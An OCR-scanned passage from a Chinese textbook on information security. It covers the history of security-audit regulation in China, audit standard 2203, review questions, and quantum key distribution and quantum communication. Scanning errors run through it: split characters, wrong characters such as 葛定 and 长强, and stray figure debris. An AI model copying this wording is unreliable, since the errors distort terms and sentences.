2. 2005 一 2009 年 信息 系统 安全 审计 成 长 发 展期 

Internet 在 国内 得 到 了 快速 的 发 展 和 普及 , 随 之 而 来 的 信息 安全 问题 不 断 涌现 ,在 这 
样 的 背景 下 ,国内 信息 系统 安全 审计 得 到 了 足够 的 重视 和 长 足 的 发 展 。 国 家 政府 部 门 、 能 
源 行业 金融 行业 、 电 信行 业 相继 推出 了 适合 于 自己 行业 特点 的 信息 系统 风险 管理 标准 、 
制度 以 及 政策 法 规 , 这 些 活动 和 策略 支撑 并 推动 了 信息 安全 审计 的 快速 发 展 。 公 安 部 于 
2005 年 12 月 颁布 了 82 号 令 ,标题 为 (互联 网 安全 保护 技术 措施 规定 》, 该 规定 要 求 “ 互 联 
网 服务 提供 者 和 连接 到 互联 网 上 的 企 事业 单位 必须 记录 、 跟 踪 网 络 运行 状态 .记录 网 络 安 
全 事件 等 安全 审计 功能 ,并 应 当 具 有 至 少 保存 六 十 天 记录 备份 的 功能 。”2006 年 ,国务 院 
信息 化 工作 办 公 室 ,国家 保密 局 公安 部 、 国 家 密码 管理 局 ,联合 统一 制定 并 发 布 了 《信息 
安全 等 级 保护 管理 办 法 (试行 版 )) ,该 办 法 要 求 在 对 信息 系统 进行 定 级 、 建 设 、 整 改 、 测 评 
等 工作 的 时 候 要 严格 按照 相关 行业 及 国家 技术 标准 进行 。 作 为 信息 安全 等 级 保护 的 重要 
基础 标准 的 (信息 系统 安全 等 级 保护 基本 要 求 ), 在 该 要 求 中 ,安全 审计 能 力 在 不 同安 全 等 
级 的 信息 系统 审计 过 程 中 也 不 尽 相同 ,如 : 需要 针对 安全 事件 ,用 户 行为 ,进行 安全 记录 ， 
并 且 该 安全 记录 可 以 被 统计 分 析 , 并 生成 报告 和 表格 。2006 年 ,国家 保密 局 于 2006 年 发 
布 了 《 涉 密 信息 系统 分 级 保护 技术 要 求 ), 简 称 BMB17 一 2006 号 文件 ,该 文件 中 要 求 对 于 
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不 同 涉 密 单 位 的 信息 系统 ,不 同 级 别 的 信息 系统 ,需要 采用 相对 应 的 审计 措施 。2006 一 
2009 年 ,在 多 个 行业 的 信息 系统 安全 建设 中 ,安全 审计 被 要 求 作 为 一 项 重要 的 工作 要 求 。 
2008 年 6 月 ,审计 署 .保监会 ,财政 部 ,证 监 会 等 联合 发 布 了 (企业 内 部 控制 基本 规范 》, 并 
于 2011 年 1 月 1 日 起 正式 实施 ,主要 针对 境内 外 同时 上 市 的 中 小 公司 ,是 我 国 审计 领域 
的 里 程 碑 式 的 举措 ,由 于 该 规范 类 似 于 美国 的 SOX 法 案 , 因 此 ,被 称 为 中 国 的 “SOX 法 
案 ”。2009 年 3 月 ,银监会 发 布 了 (商业 银行 信息 科技 风险 管理 指引 》, 该 指引 主要 是 为 了 
加 强 商业 银行 信息 系统 的 风险 管理 ,确保 其 重要 信息 系统 按照 规范 的 要 求 满足 风险 管理 ， 
降低 风险 等 级 。 其 中 该 管理 指引 明确 要 求 了 内 外 部 审计 在 其 中 的 作用 ,并 且 明 确 安 全 审 
计 要 贯穿 在 信息 系统 活动 及 生命 期 过 程 中 。 在 信息 化 不 断 发 展 的 当今 ,为 确保 信息 系统 
安全 稳定 运行 ,安全 审计 成 为 不 可 或 缺 的 重要 技术 手段 。 根 据 以 上 信息 安全 审计 的 发 展 
概述 ,各 个 行业 和 在 信息 化 发 展 过 程 中 存在 的 不 同 ,因此 ,相对 应 的 安全 审计 的 要 求 和 关 
注 点 也 不 一 样 。 而 针对 政府 部 门 来 说 ,其 主要 还 是 关注 信息 安全 等 级 保护 方面 的 要 求 , 确 
保 信 息 系 统 可 以 满足 该 等 级 保护 的 审计 要 求 。 

3. 中 国内 部 审计 协会 提出 的 2203 号 文 : 信息 系统 审计 准则 

为 了 规范 信息 系统 审计 工作 ,提高 审计 质量 和 效率 ,中 国内 部 审计 协会 提出 了 2203 
信息 系统 审计 准则 。 该 准则 适用 于 各 类 机 构 的 内 部 审计 人 员 , 内 部 审计 机 构 以 及 相关 的 
信息 系统 审计 活动 。 其 他 组 织 或 者 人 员 接受 委托 、 聘 用 ,承办 或 者 参与 内 部 审计 业务 ,也 
应 当 遵守 本 准则 。 信 息 系统 审计 的 目的 是 通过 实施 信息 系统 审计 工作 ,对 组 织 是 否 实现 
信息 技术 管理 目标 进行 审查 和 评价 ,并 基于 评价 意见 提出 管理 建议 ,协助 组 织 信息 技术 管 
理 人 员 有 效 地 履行 职责 。 

2203 信息 系统 审计 准则 于 2003 年 6 月 1 日 正式 实施 ,其 中 它 包 括 了 基本 准则 和 10 
个 内 部 审计 具体 准则 ,并 且 在 第 二 年 发 布 了 11 到 15 号 沟通 准则 ,以 及 5 个 内 部 审计 具体 
准则 。 从 2005 年 到 2013 年 8 月 ,持续 发 布 了 多 个 实务 指南 ,并且 对 该 准则 实施 了 修订 工 
作 , 修 订 后 的 终 稿 以 于 2014 年 1 月 1 日 施行 。 

在 该 准则 当中 ,在 第 二 章 一 一 般 原 则 中 第 四 条 ,明确 定义 了 信息 系统 审计 的 目的 : 信 
息 系统 审计 的 目的 是 通过 实施 信息 系统 审计 工作 ,对 组 织 是 否 实现 信息 技术 管理 目标 级 
进行 审查 和 评价 。 

另外 ,在 第 八条 ,内 部 审计 人 员 应 当 采 用 以 风险 为 基础 的 审计 方法 进行 信息 系统 审 
计 , 风 险 评估 应 当 贯 穿 于 信息 系统 审计 的 全 过 程 。 要 求 审 计 人 员 具 有 相关 的 信息 安全 风 
险 评估 的 知识 和 技能 ,能 利用 相关 工具 实施 基于 风险 评估 的 安全 审计 工作 。 在 准则 当中 
确定 了 信息 技术 的 管理 目标 , 即 : 组 织 的 信息 技术 管理 目标 主要 包括 : 保证 组 织 的 信息 
技术 战略 充分 反映 组 织 的 战略 目标 、 提 高 组 织 所 依赖 的 信息 系统 的 可 靠 性 、 稳 定性 、 安 全 
性 及 数据 处 理 的 完整 性 和 准确 性 、 提 高 信息 系统 运行 的 效果 与 效率 ,合理 保证 信息 系统 的 
运行 符合 法 律 法 规 以 及 相关 监管 要 求 。 从 以 上 分 析 可 以 看 出 ,针对 信息 系统 的 安全 审计 
是 有 详细 的 准则 依据 ,在 实施 安全 审计 的 过 程 中 需要 严格 遵守 这 些 准 则 和 要 求 , 才 能 确保 
审计 工作 的 客观 和 准确 性 。 
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12.4 本 章 小 结 


近年 来 ,信息 安全 理论 与 技术 发 展 很 快 ,从 传统 的 加 密 解密 .杀毒 软件 .防火 墙 \ 人 侵 


检测 到 容忍 人 侵 、 可 生存 性 、 可 信 计 算 、 信 息 保障 等 的 研究 ,从 关注 信息 的 保密 性 发 展 到 关 


注 信息 的 可 用 性 和 服务 的 可 持续 性 ,从 关注 单个 安全 问题 的 解决 发 展 到 研究 网 络 的 整体 


安全 状况 及 变化 趋势 。 信 息 安全 领域 进入 了 以 立体 防御 、 深 度 防御 为 核心 思想 的 信息 安 
全 保障 时 代 。 形 成 了 以 预警 攻击 防护 、 响 应 ,恢复 为 主要 特征 的 全 生命 周期 安全 管理 ,出 
现 了 大 规模 网 络 攻击 与 防护 .互联 网 安全 监管 等 许多 新 的 研究 内 容 。 安 全 管理 也 由 信息 
安全 产品 测评 发 展 到 大 规模 信息 系统 的 整体 风险 评估 与 等 级 保护 等 。 在 发 展 信息 安全 技 
术 的 同时 ,加 强 信息 安全 管理 和 信息 安全 审计 具有 重要 的 意义 。 
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1. 简 述 三 分 技术 ,七 分 管理 的 含义 。 
2. 什么 是 PDCA 模型 ? 从 PDCA 模型 角度 如 何 理解 ISMS 过 程 ? 
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. 什么 是 信息 安全 风险 评估 ? 其 包含 哪些 要 素 ? 

. 信息 安全 风险 评估 有 哪些 策略 ? 

. 简 述 信息 安全 风险 评估 流程 。 

. 从 定性 和 定理 角度 ,信息 安全 风险 评估 有 哪些 方法 ? 
. 当前 信息 安全 风险 评估 有 哪些 工具 ? 

. 简 述 信息 安全 审计 的 过 程 。 


信息 安全 新 技术 及 应 用 


本 章 学 习 要 点 : 

如 理解 量子 密 钥 分 发 .量子 隐形 传 态 过 程 ; 

如 了 和 解 建立 量子 纠缠 通道 的 相关 量子 技术 ; 
名 了 解 大 数据 面临 的 主要 安全 与 隐私 威胁 ; 
名 理解 当前 大 数据 安全 与 隐私 主要 保护 措施 ; 
如 理解 可 信 计 算 思想 及 体系 结构 ; 

局 了 解 可 信 网 络 连接 。 


13.1 量子 密码 


随 着 科学 技术 的 快速 发 展 和 创新 ,信息 安全 技术 也 不 断 取 得 新 的 突破 ,本 节 所 要 介绍 
的 量子 信息 技术 就 是 量子 力学 与 信息 技术 相 结合 而 产生 的 新 兴 交 叉 技术 。 与 传统 经 典 信 
息 技术 相 比较 ,量子 信息 技术 在 确保 信息 安全 、 提 高 运算 速度 和 探测 精度 等 方面 具有 重大 
的 .颠覆 性 的 影响 ,是 目前 最 引 人 瞩 目的 前 沿 技术 领域 之 一 。 

根据 摩尔 (Moore) 定 律 ,每 十 八 个 月 计算 机 微 处 理 器 的 速度 就 增长 一 倍 , 其 中 单位 面 
积 ( 或 体积 ) 上 集成 的 元 件数 目 会 相应 地 增加 。 可 以 预见 ,在 不 久 的 将 来 ,芯片 元 件 就 会 达 
到 它 能 以 经 典 方式 工作 的 极限 尺度 。 因 此 ,突破 这 种 尺度 极限 是 当代 信息 科学 所 面临 的 
一 个 重大 科学 问题 。 量 子 信息 的 研究 就 是 充分 利用 量子 物理 基本 原理 的 研究 成 果 ,发 挥 
量子 全 加 纠缠 等 特性 的 强大 作用 ,探索 以 全 新 的 方式 进行 计算 、 编 码 和 信息 传输 的 可 能 
性 ,为 突破 芯片 极限 提供 新 概念 、. 新 思路 和 新 途径 。 

量子 信息 技术 基于 量子 力学 特性 具有 得 天 独 厚 的 优势 ,为 信息 技术 的 发 展开 创 了 新 
的 原理 和 方法 ,包括 量子 密码 ,量子 通信 ,量子 计算 和 量子 雷达 等 领域 。 量 子 信息 领域 的 
开拓 者 一 一 美国 IBM 研究 院 的 Bennett 曾 说 :“ 量 子 信息 对 经 典 信息 的 扩展 与 完善 ,就 像 
复数 对 实数 的 扩展 与 完善 一 样 ?。 目 前 ,量子 信息 技术 已 经 成 为 信息 安全 新 技术 中 的 重要 
研究 分 支 , 本 节 主 要 介绍 量子 密码 技术 和 量子 通信 技术 两 个 方面 。 


1311 量子 密码 技术 


量子 密码 是 密码 学 与 量子 力学 相 结合 的 产物 ,不 同 于 以 数学 为 基础 的 经 典 密码 体制 。 
目前 ,经 典 密码 体制 面临 三 个 方面 的 威胁 。 首 先 , 经 典 密码 体制 安全 性 是 建立 在 没有 严格 
证 明 的 数学 难题 之 上 。 数 学 难题 的 突破 必 将 给 经 典 密码 算法 带 来 毁灭 性 打击 。 其 次 , 计 
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算 机 科学 的 飞速 发 展 导 致 其 计算 能 力 的 快速 提高 ,始终 冲击 着 经 典 密码 。 再 次 ,量子 计算 
理论 的 发 展 使 得 数学 难题 具有 量子 可 解 性 。 在 1994 年 Shor 提出 了 多 项 式 时 间 内 求解 大 
数 因子 和 离散 对 数 的 量子 算法 使 得 目前 常用 的 基于 大 数 分 解困 难 性 提出 的 RSA 公 钥 密 
码 体 制 和 ElGamal 公 钥 密码 体制 受到 极 大 威胁 。1998 年 ,Grove 提出 了 量子 搜索 算法 ， 
即 在 N 个 记录 的 无 序数 据 库 中 搜索 记录 的 时 间 复 杂 度 为 对 N 开平 方 根 ,可 以 提高 量子 计 
算 机 利用 蛮 力 攻击 方法 破解 经 典 密码 的 效率 ,使 得 经 典 密码 体制 受到 威胁 。 

量子 密码 学 的 思想 最 早 是 由 美国 人 Wiesner 在 1969 年 提出 。 后 来 IBM 的 Bennett 
和 Montreal 大 学 的 Brassard 在 此 基础 上 提出 了 量子 密码 学 的 概念 ,并 于 1984 年 提出 了 
第 一 个 量子 密 钥 分 发 (Quantum Key Distribution, QKD) 协 议 一 一 BB84 协议 。 这 一 成 果 
标志 着 量子 密码 学 的 诞生 ,也 葛 定 了 量子 密码 学 发 展 的 基础 。 之 后 ,许多 新 的 量子 密 钥 分 
配方 案 相 继 出 现 , 实 验 研究 也 取得 重大 突破 。 

鉴于 量子 密码 技术 在 下 一 代 安 全 通信 和 领域 具有 巨大 的 战略 意义 ,近年 来 ,美国 .欧盟 、 
日 本 等 投入 了 巨大 的 人 力 物 力 进行 这 一 技术 的 研究 ,新 一 轮 的 技术 竞赛 正在 激烈 进行 。 
例如 ,美国 DARPA 于 2002 一 2007 年 在 波士顿 建设 了 一 个 10 结 点 的 量子 密码 网 络 ,欧洲 
于 2009 年 在 维也纳 建立 了 一 个 8 结 点 的 量子 密码 网 络 ,2010 年 日 本 NICT 在 东京 建立 
了 一 个 4 结 点 的 量子 密码 演示 网 络 ,使 用 了 6 种 量子 密 钥 分 配 系统 。 

中 国 研究 组 在 量子 密码 技术 实用 化 研究 领域 走 在 了 世界 前 列 。2004 年 ,中 国 科 学 技 
术 大 学 韩正 甫 研究 组 在 北京 和 天 津 之 间 的 125km 商用 光纤 中 演示 了 量子 密 钥 分 配 ,并 发 
明了 基于 波 分 复 用 技术 的 “全 时 全 通 ” 型 “量子 路 由 器 ”, 实 现 了 量子 密码 网 络 中 光量 子 信 
号 的 自动 寻 址 ,并 使 用 这 一 方案 分 别 在 北京 (2007 年 ) 和 芜湖 (2009 年 ) 的 商用 光纤 通信 网 
中 组 建 了 4 结 点 和 7 结 点 的 城 域 量 子 密码 演示 网 络 。 中 国 科学 技术 大 学 潘 建 伟 研 究 组 也 
于 2008 年 和 2009 年 在 合肥 实现 了 3 结 点 和 5 结 点 量子 密码 网 络 。 目 前 ,清华 大 学 .北京 
大 学 .华东 师范 大 学 上海 交通 大 学 .华南 师范 大 学 .山西 大 学 .国防 科技 大 学 .北京 邮电 大 
学 等 单位 的 研究 组 也 在 量子 密码 技术 的 研究 上 取得 了 出 色 的 研究 成 果 。 

这 里 ,我 们 仅 以 BB84 协议 为 例 ,介绍 量子 密 钥 分 配 的 基本 原理 。 量 子 密 钥 分 配 与 经 
典 密 钥 分 配 最 本 质 的 区 别 在 于 前 者 是 运用 量子 态 来 表征 随机 数 0、1( 经 典 比特 ) ,而 现 有 
密 钥 分 配 是 运用 物理 量 来 表征 比特 0、1 的 ,如 有 无 电荷 等 。 若 采用 光 脉 冲 来 传送 比特 ,在 
经 典 信息 中 , 光 脉 冲 有 光子 代表 1 ,无 光子 代表 0, 但 在 量子 信息 中 则 是 采用 单个 光子 的 量 
子 态 , 如 偏振 状态 来 表征 比特 的 。 

BB84 协议 采用 四 个 量子 态 ( 一 , 1 ,~\,v) 来 实现 量子 密 钥 分 配 ,事先 约定 : 水 平 偏振 
和 一 45" 偏 振 代表 比特 “0” ,垂直 偏振 和 十 45" 偏 振 代表 比特 “1”, 量 子 密 钥 分 配 的 操作 步 又 
如 图 13-1 所 示 。 

这 种 密 钥 建立 方式 的 安全 性 由 量子 力学 的 测 不 准 原理 ( 指 不 可 能 完全 知道 量子 系统 
的 物理 特征 ,对 一 种 特征 的 测量 将 会 改变 另 一 种 特征 )\ 不 可 克隆 定理 ( 指 不 可 能 生成 一 个 
未 知 量子 状态 的 完整 副本 ) 保 证 : 当 有 和 窃听 者 对 信道 中 传输 的 光子 进行 窃听 时 ,会 被 合法 
的 收发 双方 通过 一 定 的 检测 步骤 发 现 。 由 于 其 物理 安全 保障 机 制 不 依赖 于 密 钥 分 发 算法 
的 计算 复杂 度 , 因 此 可 以 在 理论 上 达到 密码 学 意义 上 的 无 条 件 安全 。 

将 量子 密 钥 分 发 协议 获得 的 密 钥 与 “一 次 一 密 ” 密 码 体 制 结合 ,可 以 实现 无 条 件 安全 
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的 保密 通信 。 也 就 是 说 ,通信 双方 在 进行 保密 通信 之 前 , 先 使 用 量子 光源 ,通过 公开 的 量 
子 信道 ,依照 量子 密 钥 分 配 协议 在 通信 双方 之 间 建 立 对 称 密 钥 ,再 使 用 建立 起 来 的 密 钥 对 
明文 进行 加 密 。 这 使 得 “一 次 一 密 ” 密 码 真正 能 应 用 于 实际 。 

量子 密码 的 安全 性 是 其 核心 价值 ,安全 性 分 为 协议 安全 性 和 实际 系统 安全 性 两 个 层 
面 。 量 子 密码 概念 提出 至 今 , 研 究 者 已 设计 了 多 种 量子 密 钥 分 配 协议 ,并 围绕 这 些 通信 协 
议 的 无 条 件 安全 证 明 进 行 了 大 量 的 理论 工作 。 
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图 13-1 BB84 协议 示意 图 


在 协议 安全 性 得 到 证 明 的 基础 上 ,为 了 实现 高 可 靠 性 的 量子 密码 系统 ,我 们 还 需要 跨 
越 理想 协议 模型 和 实现 技术 之 间 的 鸿沟 。 实 际 的 量子 密码 系统 中 ,光源 ,探测 器 和 编 解 码 
器 等 部 件 都 可 能 出 现 安全 性 漏洞 。 因 此 ,对 实际 非 理 想 条 件 下 的 量子 密码 系统 安全 性 进 
行 研究 也 成 为 各 国学 者 关注 和 研究 的 对 象 。2013 年 ,由 中 国 科大 院士 潘 建 伟 及 其 同事 张 
强 、 陈 腾 云 与 清华 大 学 马 雄 峰 等 组 成 的 联合 研究 小 组 在 国际 上 首次 实现 的 测量 器 件 无 关 
的 量子 密 钥 分 发 成 果 , 以 解决 量子 黑客 隐患 的 重大 价值 成 功 入 选 国际 物理 学 “年 度 重大 
进展 ”。 

量子 密码 学 自从 提出 到 现在 已 有 三 十 多 年 的 时 间 , 量 子 密码 技术 已 发 展 成 较为 系统 
的 体系 ,其 研究 内 容 不 仅 限于 量子 密 钥 分 配 ,还 包括 诸如 量子 秘密 共享 、 量 子 比特 承诺 、 量 
子 身份 认证 、 量 子 签名 、 量 子 密码 安全 协议 .量子 密码 信息 理论 .量子 密码 分 析 等 等 许多 新 
的 研究 方向 。 总 体 来 讲 , 量 子 密码 协议 的 安全 性 是 值得 信赖 的 ,但 是 现 有 的 实际 量子 密码 
系统 来 说 ,接收 端 安 全 性 漏洞 较 之 发 射 端 大 ;往返 式 系 统 安全 性 明显 弱 于 单 向 系统 ; 单 探 
测 器 系统 安全 性 强 于 多 探测 器 系统 ; 单 激光 器 比 多 激光 器 安全 ;主动 器 件 比 被 动 器 件 安 
全 。 解 决 了 上 述 的 器 件 实现 方案 中 的 实际 安全 性 问题 ,量子 密码 才能 做 到 真正 的 安全 。 


1312 量子 通信 技术 
量子 通信 是 通信 和 信息 领域 的 研究 前 沿 , 除 量子 密码 通信 外 , 它 主要 还 涉及 量子 隐形 
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传 态 .量子 密集 编码 等 内 容 。 量 子 通信 技术 作为 应 用 前 景 极 为 广阔 的 通信 技术 领域 新 宠 ， 
以 其 绝对 安全 性 、 超 大 信道 容量 . 超 高 通信 速率 .可 远 距 离 传输 和 信息 高 效率 等 特点 ,日益 
引起 世界 范围 特别 是 一 些 大 国 的 充分 重视 紧密 跟踪 与 竞争 性 研究 。 在 1998 年 之 前 ,有 
关 量 子 通信 的 文章 多 发 表 在 英国 的 Nature 和 美国 的 Science 等 期 刊 上 。 从 1998 年 下 半 
年 开始 ,在 世界 著名 的 物理 学 期 刊 Physics Review A 上 开设 了 “Quantum Information” 专 
栏 , 比 较 集 中 地 报道 这 方面 的 研究 成 果 , 相 应 的 论文 也 逐年 增加 。 
广义 来 讲 , 量 子 密 钥 分 配 过 程 中 确实 利用 量子 态 行使 保密 通信 的 功能 。 但 是 ,这 里 的 
量子 态 的 功用 在 于 建立 通信 双方 之 间 经 典 信息 的 关联 , 即 量子 态 只 是 充当 建立 这 个 安全 
的 经 典 信息 关联 的 桥梁 和 保障 ,人 们 最 终 还 是 将 其 转化 为 经 典 信息 来 做 经 典 意义 上 的 密 
码 通信 。 而 本 节 所 说 的 量子 通信 , 则 是 完全 利用 量子 信道 来 传送 和 处 理 真正 意义 上 的 量 
子 信息 。 
量子 通信 最 关键 的 一 环 是 如 何 建立 量子 通道 (也 称 为 量子 信道 ) ,通过 这 个 量子 通道 
来 安全 无 误 地 传送 量子 态 的 信息 。 这 一 问题 于 1993 年 在 理论 上 获得 了 解决 : 量子 信息 
领域 的 开拓 者 Bennett 及 其 合作 者 ,提出 了 著名 的 quantum teleportation 方案 ,中 文 翻译 
为 “量子 隐形 传 态 ”。 
所 谓 量子 隐形 传 态 是 指 : 如 果 能 够 在 量子 通信 的 双方 (Alice 和 Bob) 之 间 建 立 最 大 
的 量子 纠缠 态 (Bell 态 ) 那 么 Alice 和 Bob 可 
以 通过 经 典 通信 来 协同 两 地 的 操作 ,利用 量 
子 纠缠 态 , 可 以 将 Alice 处 待 发送 的 量子 态 
准确 无 误 地 传送 给 Bob。 作 为 代价 ,成 功 传 
送 量 子 态 的 同时 ,量子 纠缠 态 被 损毁 。 如 见 
图 13-2 所 示 , 在 这 一 量子 通信 和 的 过 程 中 , 承 
载 Alice 处 量子 态 信息 的 物理 的 量子 系统 ， 
并 没有 被 发 送出 去 ,该 系统 仍然 待 在 Alice 
处 ;但 是 ,原先 蕴藏 在 该 系统 中 的 量子 态 的 
信息 ,已 经 借助 量子 纠缠 态 中 奇妙 的 量子 关 
国生 国生 全 全 间 刘 后 束 国 联 , 被 传送 到 Bob 处 。 仿 佛 一 个 量子 物体 的 
灵魂 被 抽 走 ,重新 装载 在 遥远 异地 的 另外 一 
个 物体 上 ,所 以 被 称 为 量子 隐形 传 态 。 有 了 量子 隐形 传 态 方案 ,我 们 就 可 以 利用 量子 纠缠 
来 做 量子 信道 ,充当 联系 各 个 结 点 的 桥梁 。 
量子 纠缠 态 是 一 种 由 多 个 微观 粒子 构成 的 复合 系统 的 量子 态 , 目 前 人 们 已 经 在 各 种 
不 同 的 物理 系统 中 产生 量子 纠缠 态 。 并 且 , 人 们 也 找到 了 最 适合 做 量子 信道 的 物理 系统 ， 
那 就 是 光子 系统 。 光 子 能 够 在 媒介 中 快速 传输 ,而 不 易 受 到 环境 的 扰动 。 
世界 上 第 一 个 量子 隐形 传 态 的 实验 验证 是 奥地利 的 Zeilinger 小 组 于 1997 年 在 光子 
系统 中 完成 的 。 此 后 ,基于 纠缠 光子 的 量子 隐形 传 态 的 研究 被 广泛 开展 。 例 如 ,2003 年 
潘 建 伟 和 Zeilinger 等 人 改进 了 先前 的 实验 ,能 够 使 得 被 传送 的 粒子 能 自由 传播 ,而 不 需 
要 先前 实验 中 必须 通过 破坏 性 的 量子 测量 来 证 实 实验 成 功 与 否 ; 潘 建 伟 等 人 于 2004 年 在 
建立 5 光子 纠缠 的 基础 上 ,完成 了 开放 终端 的 量子 隐形 传 态 ,能够 将 待 传送 的 量子 态 发 送 
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给 非 单一 的 用 户 。 

纠缠 是 量子 通信 中 的 基本 资源 ,然而 在 纠缠 分 发 过 程 中 ,由 于 通道 噪声 , 远 距 离 的 共 
享 纠缠 光子 对 质量 会 有 下 降 , 从 而 影响 量子 通信 任务 的 实现 。 如 何在 大 尺度 空间 范围 内 
建立 高 品质 的 量子 纠缠 通道 ,一 些 重 要 的 理论 ,实验 方案 被 相继 提出 。 

1. 量子 纠缠 交换 

1993 年 ,Zukowski 等 人 提出 了 量子 纠缠 交换 (quantum entanglement swapping) 的 
方案 : 对 于 两 对 纠缠 光子 ,每 对 拿 出 一 个 光子 ,将 它们 做 一 个 Bell 态 的 测量 之 后 ,剩余 的 
两 个 光子 由 最 初 的 没有 纠缠 的 状态 变 成 有 纠缠 的 状态 。 这 个 Bell 态 测量 的 过 程 相当 于 
将 两 段 绳子 接 成 一 条 长 强 , 而 这 条 长 强 就 成 了 新 的 .具有 更 长 距离 的 纠缠 通道 ,其 实验 原 
理 如 图 13-3 所 示 。 
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图 13-3 ”量子 纠缠 交换 
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2. 量子 纠缠 纯化 

Bennett 等 人 在 1996 年 提出 了 著名 的 纠缠 纯化 (entanglement purification ) 方 案 : 当 
身 处 异地 的 两 者 之 间 拥 有 很 多 对 纠缠 程度 比较 
低 的 劣质 纠缠 态 的 时 候 , 他 们 可 以 通过 一 些 局 部 
的 量子 操作 和 经 典 通 信 过 程 ,能 够 从 中 提取 出 少 
量 高 品质 的 纠缠 态 。 最 初 的 量子 纠缠 纯化 方案 
需要 用 到 受 控 非 门 ,但 精确 的 受 控 非 门 无 法 用 
现 有 技术 实现 。2001 年 , 潘 建 伟 等 提出 了 无 须 
受 控 非 门 的 纠缠 纯化 理论 方案 ,使 得 以 现 有 技 


术 实 现 纠缠 纯化 成 为 可 能 。2003 年 ,他 们 利用 经 典 通信 
该 方案 成 功 实现 了 对 任意 纠缠 态 的 纠缠 纯化 图 13-4 ”量子 纠缠 纯化 
(图 13-4)《 自 然 ) 杂 志 以 封面 论文 的 形式 发 表 了 
该 研究 成 果 。 
3. 量子 中 继 


1998 年 Briegel 等 人 提出 了 量子 中 继 (quantum repeaters) 的 策略 ,基本 上 就 是 结合 
了 纠缠 交换 和 纠缠 纯化 技术 ,将 还 远 的 两 地 分 成 很 多 中 间 结 点 ,分 发 纠缠 态 的 过 程 仅仅 在 
最 短 的 结 点 间 进 行 , 但 是 通过 不 断 地 纠缠 纯化 和 纠缠 交换 过 程 ,原则 上 可 以 在 这 遥远 的 两 
地 之 间 建 立 起 高 品质 的 共享 纠缠 态 ,从 而 实现 远 距 离 量子 通信 。 对 于 上 述 量 子 中 继 的 方 
案 , 在 物理 实现 方面 还 需要 一 个 重要 条 件 ,就 是 在 每 个 结 点 上 都 要 有 量子 的 存储 器 。 量 子 
存储 器 能 够 将 光子 的 量子 状态 较 长 时 间 地 存储 下 来 ,并 能 够 实施 必要 的 量子 操作 步骤 ,以 
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实现 纠缠 纯化 和 纠缠 连接 。 

量子 中 继 与 经 典 中 继 (俗称 “可 信 中 继 ”) 在 安全 性 上 是 完全 不 一 样 的 。 可 信 中 继 是 通 
过 中 继 把 形成 的 密码 “接力 ”下 去 , 它 要 求 所 有 中 继 站 都 是 安全 的 。 在 通信 双方 跨越 的 中 
继 站 中 只 要 有 一 个 不 安全 , 则 通信 内 容 完全 不 安全 。 而 量子 中 继 ( 图 13-5) 的 中 继 站 只 转 
换 纠缠 却 看 不 到 密码 ,即便 所 有 中 继 站 都 不 安全 ,两 个 通信 终端 间 形 成 的 密 钥 及 以 此 为 基 


础 的 通信 仍然 绝对 安全 。 
。 
J 
Alce aN 
图 13-5 量子 中 继 


除了 量子 中 继 技术 之 外 ,还 可 以 利用 卫星 和 地 面 之 间 的 光量 子 态 传输 来 增 大 量子 通 
信和 距离 。 相 对 于 在 地 表 大 气 中 的 光子 传输 ,在 星 地 之 间 的 传输 克服 了 地 表 曲 率 的 影响 , 同 
时 也 没有 障碍 物 的 阻碍 。 另 外 ,地 表 于 人 造 卫 星之 间 只 有 5 一 10km 的 水 平 大 气 等 效 厚 
度 ,而 大 气 对 某 些 波长 的 光子 吸收 非常 小 ,同时 也 能 保持 光子 极 化 纠缠 品质 ,在 外 太空 无 
衰减 和 退 相干 。 

一 个 可 能 的 展望 是 : 由 星 地 之 间 的 量子 通信 来 联系 不 同 的 城 域 量子 网 络 ,完成 量子 
密 钥 分 配 \、 量 子 隐形 传 态 、 类 空间 隔 的 量子 非 定 域 性 的 检验 等 任务 。 在 直接 以 大 气 为 媒介 
传输 光子 态 的 研究 方面 ,2007 年 欧洲 的 实验 组 已 实现 了 144km 的 自由 空间 量子 密 钥 的 
分 发 。 此 后 ,我国 专 家 、 学 者 也 在 此 研究 领域 取得 了 一 些 重大 的 成 果 。 例 如 : 2010 年 ,中 
国 科技 大 学 潘 建 伟 研究 团队 实现 了 举世 瞩目 跨越 长 城 的 16km 自由 空间 量子 隐形 传 态 的 
验证 ;2012 年 他 们 在 青海 湖 实现 了 百 公里 量 级 的 量子 态 隐 形 传输 和 量子 密 钥 分 发 。 该 距 
离 已 经 超过 了 星 地 之 间 的 等 效 大 气 厚度 ,佐证 了 星 地 量子 通信 的 可 行 性 。2015 年 ,该 团 
队 在 国际 上 首次 实现 多 自由 度量 子 体系 的 隐形 传 态 ,《 自然 ) 杂 志 以 封面 标题 的 形式 发 表 
了 这 一 最 新 研究 成 果 。 这 一 重要 突破 ,将 为 发 展 可 扩展 的 量子 计算 和 量子 网 络 技术 黄 定 
坚实 的 基础 。 不 仅 如 此 ,由 中 国 科 学 家 自主 研发 的 世界 首 颗 “ 量 子 科学 实验 卫星 (简称 量 
子 卫 星 )” 现 已 完成 关键 部 件 的 研制 与 交付 ,将 于 2016 年 发 射 , 这 或 将 使 中 国 先 于 欧美 拥 
有 量子 通信 覆盖 全 球 的 能 力 。 

最 近 10 年 ,量子 通信 研究 实现 突破 ,相关 技术 发 明 层出不穷 ,加 快 了 由 理论 朝 着 实用 
化 大 踏步 推进 的 速度 。 由 于 量子 通信 与 国家 安全 和 利益 紧密 相连 ,美国 .日 本 和 欧洲 一 些 
发 达 国 家 纷纷 投入 大 量 人 力 、 物 力 、 财 力 , 积 极 开展 量子 通信 研究 ,踊跃 推广 量子 通信 技 
术 。 尤 其 值得 注意 的 是 ,全 球 信息 产业 界 的 国际 巨头 们 .如 IBM、Philips\AT&T、Bell 实 
验 室 、.HP 西门 子 .NEC 日立、 三菱 `NTT 等 ,对 量子 通信 技术 投放 了 高 额 研发 资本 , 抓 
紧 开展 量子 通信 技术 的 研发 ,并 努力 加 强 产 业 化 。 

构建 一 个 全 量子 的 通信 网络 ,需要 有 通信 波段 的 纠缠 光源 、 高 品质 的 量子 存储 器 、 高 
效 的 量子 中 继 技 术 、 结 点 的 量子 信息 处 理 技术 等 环节 。 从 目前 的 进展 看 ,将 这 些 技 术 组 合 
在 一 起 ,构成 一 个 全 量子 的 通信 网 络 .不 存在 原则 上 的 困难 。 但 是 ,如 何 提高 各 个 环节 的 
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品质 、 优 化 整个 系统 、 达 到 高 速率 的 量子 信息 的 传输 ,将 是 一 个 很 大 的 技术 挑战 。 


13.2 大 数据 安全 与 隐私 保护 


